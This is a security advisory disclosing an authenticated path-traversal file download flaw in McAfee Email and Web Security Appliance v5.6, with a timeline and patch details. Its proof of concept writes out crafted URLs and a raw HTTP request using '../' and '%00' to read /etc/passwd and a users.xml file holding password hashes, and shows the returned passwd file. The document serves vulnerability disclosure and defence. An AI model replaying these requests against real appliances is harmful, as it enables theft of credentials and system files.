McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is possible with a crafted URL, when logged in as any user
Summary
Name: McAfee Email and Web Security Appliance v5.6 – Arbitrary file
download is possible with a crafted URL, when logged in as any user
Release Date: 30 November 2012
Reference: NGS00158
Discoverer: Ben Williams
Vendor: McAfee
Vendor Reference:
Systems Affected:
Risk: Medium
Status: Published
TimeLine
Discovered: 26 November 2011
Released: 29 November 2011
Approved: 29 November 2011
Reported: 4 December 2011
Fixed: 13 March 2012
Published: 30 November 2012
Description
McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is
possible with a crafted URL, when logged in as any user
McAfee Email and Web Security Appliance v5.6 (v5.6 1741.115) is prone to
arbitrary file download with a crafted URL, by any authenticated user
The exploit would enable an attacker to:
– Having gained access to the UI, an attacker can download arbitrary files
from the appliance
– This exploit has the file permissions of the Apache users
Technical Details
I. VULNERABILITY
McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is
possible with a crafted URL, when logged in as any user
II. BACKGROUND
McAfee (Owned by Intel) is one of the worlds best known providers of IT
security products.
The McAfee Email and Web Security Appliance provides security for Email and
Web protocols, and acts as a Firewall and Gateway solution.
III. DESCRIPTION
McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is
possible with a crafted URL, when logged in as any user
IV. PROOF OF CONCEPT
Arbitrary file download is possible with a crafted URL, when logged in as
any user.
(even a low-privileged “report user” can do this)
This is a simple get request (the filename downloaded is changed to
“backup” but it appears possible to download any file that the apache user
could access).
Various sensitive files can be recovered, such as files containing users
password hashes and application or operating system configuration files.
https://192.168.233.40/scmadmin/19320/cgi-bin/handle_download/backup?command=../../../config/wsxmlconf/wsadmin/users.xml%00
GET
/scmadmin/19320/cgi-bin/handle_download/backup?command=../../../etc/passwd%00
HTTP/1.1
Host: 192.168.233.40
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:7.0.1)
Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: https://192.168.233.40/scmadmin/19320/en_US/html/SysAdmin.html
Cookie:
SCMUserSettings=%3Dnull%26popcheck%3D1%26lastUser%3Dscmadmin%26lang%3Den_US%26last_page_id%3Dmessage_search;
SHOW_BANNER_NOTICE=BannerShown%3D1;
ws_session=SID%3DSID%3A04367A5D-0C6C-4B6E-B673-7DFD53E73157
HTTP/1.1 200 OK
Date: Sat, 26 Nov 2011 19:40:54 GMT
Server: Apache/2.0.63 (Unix)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/zip;
Content-Length: 763
Copyright (C) 2007 McAfee Inc. All rights reserved.
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
mail:x:8:12:mail:/var/spool/mail:
uucp:x:10:14:uucp:/:
nobody:x:99:99:Nobody:/:
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
support:x:500:500:Support Account:/home/support:/opt/NETAwss/mgmt/mash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/opt/NETAwss/ui/www:/sbin/nologin
Fix Information
Proper sanitation of user supplied data (not just reliance on the “Perl
-wT” options, as these don’t always work)
Update to Email and Web Security 5.5 Patch 6, Email and Web Security 5.6
Patch 3, McAfee Email Gateway 7.0 Patch 1